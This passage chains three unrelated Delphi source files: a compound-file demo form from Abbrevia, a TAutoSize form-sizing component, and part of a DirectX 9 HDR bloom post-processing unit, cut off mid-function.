TObject); procedure Defrag1Click(Sender: TObject); procedure tvDirectoryClick(Sender: TObject); private { Private declarations } public { Public declarations } end; var fmCfMain: TfmCfMain; AbCompoundFile1 : TAbCompoundFile; HexV : THexView; implementation uses QuCfNewDg, QuCfGenDg; {$R *.xfm} procedure TfmCfMain.mnuFileNewClick(Sender: TObject); var AllocSize : Integer; begin if SaveDialog1.Execute then begin if frmCfNewDlg.ShowModal = mrOK then begin if AbCompoundFile1 <> nil then AbCompoundFile1.Free; AllocSize := StrToInt(frmCfNewDlg.lbAllocSize. Items[frmCfNewDlg.lbAllocSize.ItemIndex]); AbCompoundFile1 := TAbCompoundFile.Create(SaveDialog1.FileName, frmCfNewDlg.edtVolLbl.Text, AllocSize); Caption := 'Abbrevia 3 Compound File Example (' + SaveDialog1.FileName + ')'; HexV := THexView.Create(Self); HexV.BlockSize := AllocSize; HexV.Parent := pnlHexView; HexV.Align := alClient; HexV.Stream := AbCompoundFile1.Stream; AbCompoundFile1.PopulateTreeView(tvDirectory); end; end; end; procedure TfmCfMain.mnuFileOpenClick(Sender: TObject); begin {OpenExisting compound file} if OpenDialog1.Execute then begin if AbCompoundFile1 <> nil then AbCompoundFile1.Free; AbCompoundFile1 := TAbCompoundFile.Create('', '', 512); AbCompoundFile1.Open(OpenDialog1.FileName); Caption := 'Abbrevia 3 Compound File Example (' + OpenDialog1.FileName + ')'; HexV := THexView.Create(Self); HexV.BlockSize := AbCompoundFile1.AllocationSize; HexV.Parent := pnlHexView; HexV.Align := alClient; HexV.Stream := AbCompoundFile1.Stream; AbCompoundFile1.PopulateTreeView(tvDirectory); end; end; procedure TfmCfMain.mnuFileExitClick(Sender: TObject); begin Application.Terminate; end; procedure TfmCfMain.mnuEditAddFileClick(Sender: TObject); var i : Integer; Strm : TFileStream; begin if OpenDialog2.Execute then begin Strm := TFileStream.Create(OpenDialog2.FileName, fmOpenRead or fmShareDenyNone); AbCompoundFile1.AddFile(OpenDialog2.FileName, Strm, Strm.Size); Strm.Free; AbCompoundFile1.PopulateTreeView(tvDirectory); for i := 0 to tvDirectory.Items.Count - 1 do tvDirectory.Items.Item[i].Expand(True); HexV.Stream := AbCompoundFile1.Stream; end; end; procedure TfmCfMain.mnuEditAddFolderClick(Sender: TObject); var i : Integer; begin if frmCfGenDlg.ShowModal = mrOK then begin AbCompoundFile1.AddFolder(frmCfGenDlg.Edit1.Text); AbCompoundFile1.PopulateTreeView(tvDirectory); for i := 0 to tvDirectory.Items.Count - 1 do tvDirectory.Items.Item[i].Expand(True); end; HexV.Stream := AbCompoundFile1.Stream; end; procedure TfmCfMain.mnuEditDeleteClick(Sender: TObject); var i : Integer; begin if tvDirectory.Selected.ImageIndex = 0 then AbCompoundFile1.DeleteFolder(tvDirectory.Selected.Text) else AbCompoundFile1.DeleteFile(tvDirectory.Selected.Text); HexV.Stream := AbCompoundFile1.Stream; AbCompoundFile1.PopulateTreeView(tvDirectory); for i := 0 to tvDirectory.Items.Count - 1 do tvDirectory.Items.Item[i].Expand(True); end; procedure TfmCfMain.mnuEditChangeDirClick(Sender: TObject); begin frmCfGenDlg.Caption := AbCompoundFile1.CurrentDirectory; if frmCfGenDlg.ShowModal = mrOK then begin AbCompoundFile1.CurrentDirectory := frmCfGenDlg.Edit1.Text; StatusBar1.SimpleText := ' Current Directory: ' + AbCompoundFile1.CurrentDirectory; end; end; procedure TfmCfMain.puViewFileClick(Sender: TObject); var Strm : TStream; begin Strm := TMemoryStream.Create; AbCompoundFile1.OpenFile(tvDirectory.Selected.Text, Strm); Hexv.SetStream(Strm); Strm.Free; end; procedure TfmCfMain.puViewCompoundFileClick(Sender: TObject); begin HexV.Stream := AbCompoundFile1.Stream; end; procedure TfmCfMain.Rename1Click(Sender: TObject); begin frmCfGenDlg.Caption := 'Rename'; frmCfGenDlg.Label1.Caption := 'New Name'; if frmCfGenDlg.ShowModal = mrOK then begin if tvDirectory.Selected.ImageIndex = 0 then AbCompoundFile1.RenameFolder(tvDirectory.Selected.Text, frmCfGenDlg.Edit1.Text) else AbCompoundFile1.RenameFile(tvDirectory.Selected.Text, frmCfGenDlg.Edit1.Text); end; frmCfGenDlg.Caption := 'Change Directory'; frmCfGenDlg.Label1.Caption := 'New Directory'; end; procedure TfmCfMain.Defrag1Click(Sender: TObject); var i : Integer; begin AbCompoundFile1.Defrag; HexV.Stream := AbCompoundFile1.Stream; AbCompoundFile1.PopulateTreeView(tvDirectory); for i := 0 to tvDirectory.Items.Count - 1 do tvDirectory.Items.Item[i].Expand(True); end; procedure TfmCfMain.tvDirectoryClick(Sender: TObject); begin if (tvDirectory.Selected.ImageIndex = 0) then begin AbCompoundFile1.CurrentDirectory := tvDirectory.Selected.Text; StatusBar1.SimpleText := ' Current Directory: ' + AbCompoundFile1.CurrentDirectory; end; end; end.
unit AutoSize; interface uses Windows, Messages, SysUtils, Forms, Classes, Controls; type TDuplicateError = class(Exception); TAutoSize = class(TControl) private FormHandle: HWnd; NewWndProc: TFarProc; PrevWndProc: TFarProc; CheckAfterShow: Boolean; procedure WndPro(var Msg: TMessage); procedure WMWindowPosChanged(var Msg: TWMWindowPosChanged); message WM_WINDOWPOSCHANGED; protected procedure AdjustClientArea; virtual; public constructor Create(AOwner: TComponent); override; destructor Destroy; override; end; procedure Register; implementation constructor TAutoSize.Create(AOwner: TComponent); var I: Word; AutoSizeCount: Byte; begin AutoSizeCount:=0; NewWndProc:=nil; PrevWndProc:=nil; inherited Create(AOwner); with (AOwner as TForm) do begin if (csDesigning in ComponentState) then begin for I:=0 to ComponentCount-1 do if Components[I] is TAutoSize then Inc(AutoSizeCount); if AutoSizeCount>1 then raise TDuplicateError.Create('A TAutoSize component already exists'); end; FormHandle:=Handle; NewWndProc:=MakeObjectInstance(WndPro); PrevWndProc:=Pointer(SetWindowLong(FormHandle, GWL_WNDPROC, LongInt(NewWndProc))); end; end; destructor TAutoSize.Destroy; begin if Assigned(PrevWndProc) then begin SetWindowLong(FormHandle, GWL_WNDPROC, Longint(PrevWndProc)); PrevWndProc:=nil; end; if NewWndProc<>nil then FreeObjectInstance(NewWndProc); inherited Destroy; end; procedure TAutoSize.WndPro(var Msg: TMessage); begin with Msg do begin case Msg of WM_SIZE: if (csDesigning in ComponentState) then begin Left:=LoWord(lParam)-2; Top:=HiWord(lParam)-2; end; WM_SHOWWINDOW: if not(csDesigning in ComponentState) then if Boolean(wParam) then if not CheckAfterShow then begin AdjustClientArea; CheckAfterShow:=True; end; end; Result:=CallWindowProc(PrevWndProc, FormHandle, Msg, wParam, lParam); end; end; procedure TAutoSize.WMWindowPosChanged(var Msg: TWMWindowPosChanged); begin if (csDesigning in ComponentState) then begin Left:=TForm(Owner).ClientWidth-2; Top:=TForm(Owner).ClientHeight-2; Width:=2; Height:=2; end else if not CheckAfterShow then AdjustClientArea; Msg.Result:=0; end; procedure TAutoSize.AdjustClientArea; begin TForm(Owner).ClientWidth:=Left+Width; TForm(Owner).ClientHeight:=Top+Height; end; procedure Register; begin RegisterComponents('Idms', [TAutoSize]); end; end.
(*----------------------------------------------------------------------------* * Direct3D sample from DirectX 9.0 SDK December 2006 * * Delphi adaptation by Alexey Barkovoy (e-mail: directx@clootie.ru) * * * * Supported compilers: Delphi 5,6,7,9; FreePascal 2.0 * * * * Latest version can be downloaded from: * * http://www.clootie.ru * * http://sourceforge.net/projects/delphi-dx9sdk * *----------------------------------------------------------------------------* * $Id: PostProcess.pas,v 1.5 2007/02/05 22:21:08 clootie Exp $ *----------------------------------------------------------------------------*) //====================================================================== // // HIGH DYNAMIC RANGE RENDERING DEMONSTRATION // Written by Jack Hoxley, November 2005 // //====================================================================== {$I DirectX.inc} unit PostProcess; interface uses Windows, Direct3D9, D3DX9; // All post processing functionality is wrapped up, and consequently // accessed via, the following namespace: // namespace PostProcess // This function creates the necessary resources for the // functionality of this module. function CreateResources(const pDevice: IDirect3DDevice9; const pDisplayDesc: TD3DSurfaceDesc): HRESULT; // This provides the opposite functionality to the above // 'CreateResources' - making sure that any allocated resources // are correctly released. function DestroyResources: HRESULT; // The core function for this method - takes the HDR data from // 'HDRScene' and applies the necessary steps to produce the // post-processed input into the final image composition. function PerformPostProcessing(const pDevice: IDirect3DDevice9): HRESULT; // The final image composition requires the results of this modules // work as an input texture. This function allows other modules to // access the texture and use it as appropriate. function GetTexture(out pTexture: IDirect3DTexture9): HRESULT; // The following 4 pairs of functions allow the respective parameters // to be exposed via the GUI. Because the actual GUI events are contained // entirely in 'HDRDemo.cpp' these accessors are required: function GetBrightPassThreshold: Single; procedure SetBrightPassThreshold(const threshold: Single); function GetGaussianMultiplier: Single; procedure SetGaussianMultiplier(const multiplier: Single); function GetGaussianMean: Single; procedure SetGaussianMean(const mean: Single); function GetGaussianStandardDeviation: Single; procedure SetGaussianStandardDeviation(const sd: Single); // This function takes all the intermediary steps created/used by // the 'PerformPostProcessing' function (above) and displays them // to the GUI. Also annotates the steps. function DisplaySteps(const pDevice: IDirect3DDevice9; const pFont: ID3DXFont; const pTextSprite: ID3DXSprite; const pArrowTex: IDirect3DTexture9 ): HRESULT; // A simple utility function that makes a guesstimate as to // how much VRAM is being used by this modules key resources. function CalculateResourceUsage: DWORD; implementation uses Math, DXUTcore, DXUTmisc, StrSafe, HDREnumeration, HDRScene; //-------------------------------------------------------------------------------------- // Data Structure Definitions //-------------------------------------------------------------------------------------- type TLVertex = record p: TD3DXVector4; t: TD3DXVector2; end; const FVF_TLVERTEX = D3DFVF_XYZRHW or D3DFVF_TEX1; //-------------------------------------------------------------------------------------- // Namespace-level variables //-------------------------------------------------------------------------------------- var g_pBrightPassTex: IDirect3DTexture9 = nil; // The results of performing a bright pass on the original HDR imagery g_pDownSampledTex: IDirect3DTexture9 = nil; // The scaled down version of the bright pass results g_pBloomHorizontal: IDirect3DTexture9 = nil; // The horizontally blurred version of the downsampled texture g_pBloomVertical: IDirect3DTexture9 = nil; // The vertically blurred version of the horizontal blur g_fmtHDR: TD3DFormat = D3DFMT_UNKNOWN; // What HDR (128 or 64) format is being used g_pBrightPassPS: IDirect3DPixelShader9 = nil; // Represents the bright pass processing g_pBrightPassConstants: ID3DXConstantTable = nil; g_pDownSamplePS: IDirect3DPixelShader9 = nil; // Represents the downsampling processing g_pDownSampleConstants: ID3DXConstantTable = nil; g_pHBloomPS: IDirect3DPixelShader9 = nil; // Performs the first stage of the bloom rendering g_pHBloomConstants: ID3DXConstantTable = nil; g_pVBloomPS: IDirect3DPixelShader9 = nil; // Performs the second stage of the bloom rendering g_pVBloomConstants: ID3DXConstantTable = nil; g_BrightThreshold: Single = 0.8; // A configurable parameter into the pixel shader g_GaussMultiplier: Single = 0.4; // Default multiplier g_GaussMean: Single = 0.0; // Default mean for gaussian distribution g_GaussStdDev: Single = 0.8; // Default standard deviation for gaussian distribution //-------------------------------------------------------------------------------------- // Function Prototypes //-------------------------------------------------------------------------------------- function RenderToTexture(const pDev: IDirect3DDevice9): HRESULT; forward; function ComputeGaussianValue(x: Single; mean: Single; std_deviation: Single): Single; forward; //-------------------------------------------------------------------------------------- // CreateResources( ) // // DESC: // This function creates all the necessary resources to produce the post- // processing effect for the HDR input. When this function completes successfully // rendering can commence. A call to 'DestroyResources()' should be made when // the application closes. // // PARAMS: // pDevice : The current device that resources should be created with/from // pDisplayDesc : Describes the back-buffer currently in use, can be useful when // creating GUI based resources. // // NOTES: // n/a //-------------------------------------------------------------------------------------- function CreateResources(const pDevice: IDirect3DDevice9; const pDisplayDesc: TD3DSurfaceDesc): HRESULT; var pCode: ID3DXBuffer; str: array[0..MAX_PATH-1] of WideChar; begin // [ 0 ] GATHER NECESSARY INFORMATION //----------------------------------- Result := V(HDREnumeration.FindBestHDRFormat(PostProcess.g_fmtHDR)); if FAILED(Result) then begin // High Dynamic Range Rendering is not supported on this device! OutputDebugString('PostProcess::CreateResources() - Current hardware does not allow HDR rendering!'#10); Exit; end; // [ 1 ] CREATE BRIGHT PASS TEXTURE //--------------------------------- // Bright pass texture is 1/2 the size of the original HDR render target. // Part of the pixel shader performs a 2x2 downsampling. The downsampling // is intended to reduce the number of pixels that need to be worked on - // in general, HDR pipelines tend to be fill-rate heavy. Result := V(pDevice.CreateTexture( pDisplayDesc.Width div 2, pDisplayDesc.Height div 2, 1, D3DUSAGE_RENDERTARGET, PostProcess.g_fmtHDR, D3DPOOL_DEFAULT, PostProcess.g_pBrightPassTex, nil)); if FAILED(Result) then begin // We couldn't create the texture - lots of possible reasons for this... OutputDebugString('PostProcess::CreateResources() - Could not create bright-pass render target. Examine D3D Debug Output for details.'#10); Exit; end; // [ 2 ] CREATE BRIGHT PASS PIXEL SHADER //-------------------------------------- Result:= DXUTFindDXSDKMediaFile(str, MAX_PATH, 'Shader Code\PostProcessing.psh'); if V_Failed(Result) then Exit; Result := V(D3DXCompileShaderFromFileW( str, nil, nil, 'BrightPass', 'ps_2_0', 0, @pCode, nil, @PostProcess.g_pBrightPassConstants )); if FAILED(Result) then begin // Couldn't compile the shader, use the 'compile_shaders.bat' script // in the 'Shader Code' folder to get a proper compile breakdown. OutputDebugString('PostProcess::CreateResources() - Compiling of ''BrightPass'' from ''PostProcessing.psh'' failed!'#10); Exit; end; Result := V(pDevice.CreatePixelShader(PDWORD(pCode.GetBufferPointer), PostProcess.g_pBrightPassPS)); if FAILED(Result) then begin // Couldn't turn the compiled shader into an actual, usable, pixel shader! OutputDebugString('PostProcess::CreateResources() - Could not create a pixel shader object for ''BrightPass''.'#10); pCode := nil; Exit; end; pCode := nil; // [ 3 ] CREATE DOWNSAMPLED TEXTURE //--------------------------------- // This render target is 1/8th the size of the original HDR image (or, more // importantly, 1/4 the size of the bright-pass). The downsampling pixel // shader performs a 4x4 downsample in order to reduce the number of pixels // that are sent to the horizontal/vertical blurring stages. Result := V(pDevice.CreateTexture( pDisplayDesc.Width div 8, pDisplayDesc.Height div 8, 1, D3DUSAGE_RENDERTARGET, PostProcess.g_fmtHDR, D3DPOOL_DEFAULT, PostProcess.g_pDownSampledTex, nil)); if FAILED(Result) then begin // We couldn't create the texture - lots of possible reasons for this... OutputDebugString('PostProcess::CreateResources() - Could not create downsampling render target. Examine D3D Debug Output for details.'#10); Exit; end; // [ 3 ] CREATE DOWNSAMPLING PIXEL SHADER //--------------------------------------- Result := DXUTFindDXSDKMediaFile(str, MAX_PATH, 'Shader Code\PostProcessing.psh'); if V_Failed(Result) then Exit; Result := V(D3DXCompileShaderFromFileW( str, nil, nil, 'DownSample', 'ps_2_0', 0, @pCode, nil, @PostProcess.g_pDownSampleConstants )); if FAILED(Result) then begin // Couldn't compile the shader, use the 'compile_shaders.bat' script // in the 'Shader Code' folder to get a proper compile breakdown. OutputDebugString('PostProcess::CreateResources() - Compiling of ''DownSample'' from ''PostProcessing.psh'' failed!'#10); Exit; end; Result := V(pDevice.CreatePixelShader(PDWORD(pCode.GetBufferPointer), PostProcess.g_pDownSamplePS)); if FAILED(Result) then begin // Couldn't turn the compiled shader into an actual, usable, pixel shader! OutputDebugString('PostProcess::CreateResources() - Could not create a pixel shader object for ''DownSample''.'#10); pCode := nil; Exit; end; pCode := nil; // [ 4 ] CREATE HORIZONTAL BLOOM TEXTURE //-------------------------------------- // The horizontal bloom texture is the same dimension as the down sample // render target. Combining a 4x4 downsample operation as well as a // horizontal blur leads to a prohibitively high number of texture reads. Result := V(pDevice.CreateTexture( pDisplayDesc.Width div 8, pDisplayDesc.Height div 8, 1, D3DUSAGE_RENDERTARGET, PostProcess.g_fmtHDR, D3DPOOL_DEFAULT, PostProcess.g_pBloomHorizontal, nil)); if FAILED(Result) then begin // We couldn't create the texture - lots of possible reasons for this... OutputDebugString('PostProcess::CreateResources() - Could not create horizontal bloom render target. Examine D3D Debug Output for details.'#10); Exit; end; // [ 5 ] CREATE HORIZONTAL BLOOM PIXEL SHADER //------------------------------------------- Result:= DXUTFindDXSDKMediaFile(str, MAX_PATH, 'Shader Code\PostProcessing.psh'); if V_Failed(Result) then Exit; Result := V(D3DXCompileShaderFromFileW( str, nil, nil, 'HorizontalBlur', 'ps_2_0', 0, @pCode, nil, @PostProcess.g_pHBloomConstants )); if FAILED(Result) then begin // Couldn't compile the shader, use the 'compile_shaders.bat' script // in the 'Shader Code' folder to get a proper compile breakdown. OutputDebugString('PostProcess::CreateResources() - Compiling of ''HorizontalBlur'' from ''PostProcessing.psh'' failed!'#10); Exit; end; Result := V(pDevice.CreatePixelShader(PDWORD(pCode.GetBufferPointer), PostProcess.g_pHBloomPS)); if FAILED(Result) then begin // Couldn't turn the compiled shader into an actual, usable, pixel shader! OutputDebugString('PostProcess::CreateResources() - Could not create a pixel shader object for ''HorizontalBlur''.'#10); pCode := nil; Exit; end; pCode := nil; // [ 6 ] CREATE VERTICAL BLOOM TEXTURE //------------------------------------ // The vertical blur texture must be the same size as the horizontal blur texture // so as to get a correct 2D distribution pattern. Result := V(pDevice.CreateTexture( pDisplayDesc.Width div 8, pDisplayDesc.Height div 8, 1, D3DUSAGE_RENDERTARGET, PostProcess.g_fmtHDR, D3DPOOL_DEFAULT, PostProcess.g_pBloomVertical, nil)); if FAILED(Result) then begin // We couldn't create the texture - lots of possible reasons for this... OutputDebugString('PostProcess::CreateResources() - Could not create vertical bloom render target. Examine D3D Debug Output for details.'#10); Exit; end; // [ 7 ] CREATE VERTICAL BLOOM PIXEL SHADER //----------------------------------------- Result:= DXUTFindDXSDKMediaFile(str, MAX_PATH, 'Shader Code\PostProcessing.psh'); if V_Failed(Result) then Exit; Result := V(D3DXCompileShaderFromFileW( str, nil, nil, 'VerticalBlur', 'ps_2_0', 0, @pCode, nil, @PostProcess.g_pVBloomConstants )); if FAILED(Result) then begin // Couldn't compile the shader, use the 'compile_shaders.bat' script // in the 'Shader Code' folder to get a proper compile breakdown. OutputDebugString('PostProcess::CreateResources() - Compiling of ''VerticalBlur'' from ''PostProcessing.psh'' failed!'#10); Exit; end; Result := V(pDevice.CreatePixelShader(PDWORD(pCode.GetBufferPointer), PostProcess.g_pVBloomPS)); if FAILED(Result) then begin // Couldn't turn the compiled shader into an actual, usable, pixel shader! OutputDebugString('PostProcess::CreateResources() - Could not create a pixel shader object for ''VerticalBlur''.'#10); pCode := nil; Exit; end; pCode := nil; end; //-------------------------------------------------------------------------------------- // DestroyResources( ) // // DESC: // Makes sure that the resources acquired in CreateResources() are cleanly // destroyed to avoid any errors and/or memory leaks. // //-------------------------------------------------------------------------------------- function DestroyResources: HRESULT; begin SAFE_RELEASE(g_pBrightPassTex); SAFE_RELEASE(g_pDownSampledTex); SAFE_RELEASE(g_pBloomHorizontal); SAFE_RELEASE(g_pBloomVertical); SAFE_RELEASE(g_pBrightPassPS); SAFE_RELEASE(g_pBrightPassConstants); SAFE_RELEASE(g_pDownSamplePS); SAFE_RELEASE(g_pDownSampleConstants); SAFE_RELEASE(g_pHBloomPS); SAFE_RELEASE(g_pHBloomConstants); SAFE_RELEASE(g_pVBloomPS); SAFE_RELEASE(g_pVBloomConstants); Result:= S_OK; end; //-------------------------------------------------------------------------------------- // PerformPostProcessing( ) // // DESC: // This is the core function for this module - it takes the raw HDR image // generated by the 'HDRScene' component and puts it through 4 post // processing stages - to end up with a bloom effect on the over-exposed // (HDR) parts of the image. // // PARAMS: // pDevice : The device that will be rendered to // // NOTES: // n/a // //-------------------------------------------------------------------------------------- function PerformPostProcessing(const pDevice: IDirect3DDevice9): HRESULT; var pHDRSource: IDirect3DTexture9; pBrightPassSurf: IDirect3DSurface9; offsets: array[0..3] of TD3DXVector4; srcDesc: TD3DSurfaceDesc; sU, sV: Single; pDownSampleSurf: IDirect3DSurface9; destDesc: TD3DSurfaceDesc; dsOffsets: array[0..15] of TD3DXVector4; idx: Integer; i, j: Integer; pHBloomSurf: IDirect3DSurface9; // Configure the sampling offsets and their weights HBloomWeights: array[0..8] of Single; HBloomOffsets: array[0..8] of Single; VBloomWeights: array[0..8] of Single; VBloomOffsets: array[0..8] of Single; x: Single; pVBloomSurf: IDirect3DSurface9; begin Result:= E_FAIL; // [ 0 ] BRIGHT PASS //------------------ if FAILED(HDRScene.GetOutputTexture(pHDRSource)) then begin // Couldn't get the input - means that none of the subsequent // work is worth attempting! OutputDebugString('PostProcess.PerformPostProcessing - Unable to retrieve source HDR information!'#10); Exit; end; if FAILED(PostProcess.g_pBrightPassTex.GetSurfaceLevel(0, pBrightPassSurf)) then begin // Can't get the render target. Not good news! OutputDebugString('PostProcess::PerformPostProcessing() - Couldn''t retrieve top level surface for bright pass render target.'#10); Exit; end; pDevice.SetRenderTarget(0, pBrightPassSurf); // Configure the output of this stage pDevice.SetTexture(0, pHDRSource); // Configure the input.. pDevice.SetPixelShader(PostProcess.g_pBrightPassPS); PostProcess.g_pBrightPassConstants.SetFloat(pDevice, 'fBrightPassThreshold', PostProcess.g_BrightThreshold); // We need to compute the sampling offsets used for this pass. // A 2x2 sampling pattern is used, so we need to generate 4 offsets // Find the dimensions for the source data pHDRSource.GetLevelDesc(0, srcDesc); // Because the source and destination are NOT the same sizes, we // need to provide offsets to correctly map between them. sU := 1.0 / srcDesc.Width; sV := 1.0 / srcDesc.Height; // The last two components (z,w) are unused. This makes for simpler code, but if // constant-storage is limited then it is possible to pack 4 offsets into 2 float4's offsets[0] := D3DXVector4(-0.5 * sU, 0.5 * sV, 0.0, 0.0); offsets[1] := D3DXVector4( 0.5 * sU, 0.5 * sV, 0.0, 0.0); offsets[2] := D3DXVector4(-0.5 * sU, -0.5 * sV, 0.0, 0.0); offsets[3] := D3DXVector4( 0.5 * sU, -0.5 * sV, 0.0, 0.0); PostProcess.g_pBrightPassConstants.SetVectorArray(pDevice, 'tcDownSampleOffsets', @offsets, 4); RenderToTexture(pDevice); // [ 1 ] DOWN SAMPLE //------------------ if FAILED(PostProcess.g_pDownSampledTex.GetSurfaceLevel(0, pDownSampleSurf)) then begin // Can't get the render target. Not good news! OutputDebugString('PostProcess::PerformPostProcessing() - Couldn''t retrieve top level surface for down sample render target.'#10); Exit; end; pDevice.SetRenderTarget(0, pDownSampleSurf); pDevice.SetTexture(0, PostProcess.g_pBrightPassTex); pDevice.SetPixelShader(PostProcess.g_pDownSamplePS); // We need to compute the sampling offsets used for this pass. // A 4x4 sampling pattern is used, so we need to generate 16 offsets // Find the dimensions for the source data PostProcess.g_pBrightPassTex.GetLevelDesc(0, srcDesc); // Find the dimensions for the destination data pDownSampleSurf.GetDesc(destDesc); // Compute the offsets required for down-sampling. If constant-storage space // is important then this code could be packed into 8xFloat4's. The code here // is intentionally less efficient to aid readability... idx := 0; for i := -2 to 1 do begin for j := -2 to 1 do begin dsOffsets[idx] := D3DXVector4( (i + 0.5) * (1.0 / destDesc.Width), (j + 0.5) * (1.0 / destDesc.Height), 0.0, // unused 0.0 // unused ); Inc(idx); end; end; PostProcess.g_pDownSampleConstants.SetVectorArray(pDevice, 'tcDownSampleOffsets', @dsOffsets, 16); RenderToTexture(pDevice); // [ 2 ] BLUR HORIZONTALLY //------------------------ if FAILED(PostProcess.g_pBloomHorizontal.GetSurfaceLevel(0, pHBloomSurf)) then begin // Can't get the render target. Not good news! OutputDebugString('PostProcess::PerformPostProcessing() - Couldn''t retrieve top level surface for horizontal bloom render target.'#10); Exit; end; pDevice.SetRenderTarget(0, pHBloomSurf); pDevice.SetTexture(0, PostProcess.g_pDownSampledTex); pDevice.SetPixelShader(PostProcess.g_pHBloomPS); // Configure the sampling offsets and their weights // float HBloomWeights[9]; // float HBloomOffsets[9]; for i := 0 to 8 do begin // Compute the offsets. We take 9 samples - 4 either side and one in the middle: // i = 0, 1, 2, 3, 4, 5, 6, 7, 8 //Offset = -4, -3, -2, -1, 0, +1, +2, +3, +4 HBloomOffsets[i] := (i - 4.0) * (1.0 / destDesc.Width); // 'x' is just a simple alias to map the [0,8] range down to a [-1,+1] x := (i - 4.0) / 4.0; // Use a gaussian distribution. Changing the standard-deviation // (second parameter) as well as the amplitude (multiplier) gives // distinctly different results. HBloomWeights[i] := g_GaussMultiplier * ComputeGaussianValue(x, g_GaussMean, g_GaussStdDev); end; // Commit both arrays to the device: PostProcess.g_pHBloomConstants.SetFloatArray(pDevice, 'HBloomWeights', @HBloomWeights, 9); PostProcess.g_pHBloomConstants.SetFloatArray(pDevice, 'HBloomOffsets', @HBloomOffsets, 9); RenderToTexture(pDevice); // [ 3 ] BLUR VERTICALLY //---------------------- if FAILED(PostProcess.g_pBloomVertical.GetSurfaceLevel(0, pVBloomSurf)) then begin // Can't get the render target. Not good news! OutputDebugString('PostProcess::PerformPostProcessing() - Couldn''t retrieve top level surface for vertical bloom render target.'#10); Exit; end; pDevice.SetRenderTarget(0, pVBloomSurf); pDevice.SetTexture(0, PostProcess.g_pBloomHorizontal); pDevice.SetPixelShader(PostProcess.g_pVBloomPS); // Configure the sampling offsets and their weights // It is worth noting that although this code is almost identical to the // previous section ('H' weights, above) there is an important difference: destDesc.Height. // The bloom render targets are *not* square, such that you can't re-use the same offsets in // both directions. // float VBloomWeights[9]; // float VBloomOffsets[9]; for i := 0 to 8 do begin // Compute the offsets. We take 9 samples - 4 either side and one in the middle: // i = 0, 1, 2, 3, 4, 5, 6, 7, 8 //Offset = -4, -3, -2, -1, 0, +1, +2, +3, +4 VBloomOffsets[i] := (i - 4.0) * (1.0 / destDesc.Height); // 'x' is just a simple alias to map the [0,8] range down to a [-1,+1] x := (i - 4.0) / 4.0; // Use a gaussian distribution. Changing the standard-deviation // (second parameter) as well as the amplitude (multiplier) gives // distinctly different results. VBloomWeights[i] := g_GaussMultiplier * ComputeGaussianValue(x, g_GaussMean, g_GaussStdDev); end; // Commit both arrays to the device: PostProcess.g_pVBloomConstants.SetFloatArray(pDevice, 'VBloomWeights', @VBloomWeights, 9); PostProcess.g_pVBloomConstants.SetFloatArray(pDevice, 'VBloomOffsets', @VBloomOffsets, 9); RenderToTexture(pDevice); // [ 4 ] CLEAN UP //--------------- SAFE_RELEASE(pHDRSource); SAFE_RELEASE(pBrightPassSurf); SAFE_RELEASE(pDownSampleSurf); SAFE_RELEASE(pHBloomSurf); SAFE_RELEASE(pVBloomSurf); Result:= S_OK; end; //-------------------------------------------------------------------------------------- // GetTexture( ) // // DESC: // The results generated by PerformPostProcessing() are required as an input // into the final image composition. Because that final stage is located // in another code module, it must be able to safely access the correct // texture stored internally within this module. // // PARAMS: // pTexture : Should be NULL on entry, will be a valid reference on exit // // NOTES: // The code that requests the reference is responsible for releasing their // copy of the texture as soon as they are finished using it. // //-------------------------------------------------------------------------------------- function GetTexture(out pTexture: IDirect3DTexture9): HRESULT; begin // [ 0 ] ERASE ANY DATA IN THE INPUT //---------------------------------- //SAFE_RELEASE( *pTexture ); // [ 1 ] COPY THE PRIVATE REFERENCE //--------------------------------- pTexture := PostProcess.g_pBloomVertical; // [ 2 ] INCREMENT THE REFERENCE COUNT.. //-------------------------------------- //(*pTexture).AddRef(); Result:= S_OK; end; //-------------------------------------------------------------------------------------- // GetBrightPassThreshold( ) // // DESC: // Returns the current bright pass threshold, as used by the PostProcessing.psh // pixel shader. // //-------------------------------------------------------------------------------------- function GetBrightPassThreshold: Single; begin Result:= PostProcess.g_BrightThreshold; end; //-------------------------------------------------------------------------------------- // SetBrightPassThreshold( ) // // DESC: // Allows another module to configure the threshold at which a pixel is // considered to be "bright" and thus get fed into the post-processing // part of the pipeline. // // PARAMS: // threshold : The new value to be used // //-------------------------------------------------------------------------------------- procedure SetBrightPassThreshold(const threshold: Single); begin PostProcess.g_BrightThreshold := threshold; end; //-------------------------------------------------------------------------------------- // GetGaussianMultiplier( ) // // DESC: // Returns the multiplier used to scale the gaussian distribution. // //-------------------------------------------------------------------------------------- function GetGaussianMultiplier: Single; begin Result:= PostProcess.g_GaussMultiplier; end; //-------------------------------------------------------------------------------------- // SetGaussianMultiplier( ) // // DESC: // Allows another module to configure the general multiplier. Not strictly // part of the gaussian distribution, but a useful factor to help control the // intensity of the bloom. // // PARAMS: // multiplier : The new value to be used // //-------------------------------------------------------------------------------------- procedure SetGaussianMultiplier(const multiplier: Single); begin PostProcess.g_GaussMultiplier := multiplier; end; //-------------------------------------------------------------------------------------- // GetGaussianMean( ) // // DESC: // Returns the mean used to compute the gaussian distribution for the bloom // //-------------------------------------------------------------------------------------- function GetGaussianMean: Single; begin Result:= PostProcess.g_GaussMean; end; //-------------------------------------------------------------------------------------- // SetGaussianMean( ) // // DESC: // Allows another module to specify where the peak will be in the gaussian // distribution. Values should be between -1 and +1; a value of 0 will be // best. // // PARAMS: // mean : The new value to be used // //-------------------------------------------------------------------------------------- procedure SetGaussianMean(const mean: Single); begin PostProcess.g_GaussMean := mean; end; //-------------------------------------------------------------------------------------- // GetGaussianStandardDeviation( ) // // DESC: // Returns the standard deviation used to construct the gaussian distribution // used by the horizontal/vertical bloom processing. // //-------------------------------------------------------------------------------------- function GetGaussianStandardDeviation: Single; begin Result:= PostProcess.g_GaussStdDev; end; //-------------------------------------------------------------------------------------- // SetGaussianStandardDeviation( ) // // DESC: // Allows another module to configure the standard deviation // used to generate a gaussian distribution. Should be between // 0.0 and 1.0 for valid results. // // PARAMS: // sd : The new value to be used // //-------------------------------------------------------------------------------------- procedure SetGaussianStandardDeviation(const sd: Single); begin PostProcess.g_GaussStdDev := sd; end; //-------------------------------------------------------------------------------------- //-------------------------------------------------------------------------------------- // DisplaySteps( ) // // DESC: // Part of the GUI in this application displays the four stages that make up // the post-processing stage of the HDR rendering pipeline. This function // is responsible for making sure that each stage is drawn as expected. // // PARAMS: // pDevice : The device to be drawn to. // pFont : The font used to annotate the display // pTextSprite : Used to improve the performance of text rendering // pArrowTex : Stores the 4 (up/down/left/right) icons used in the GUI // // NOTES: // n/a // //-------------------------------------------------------------------------------------- function DisplaySteps(const pDevice: 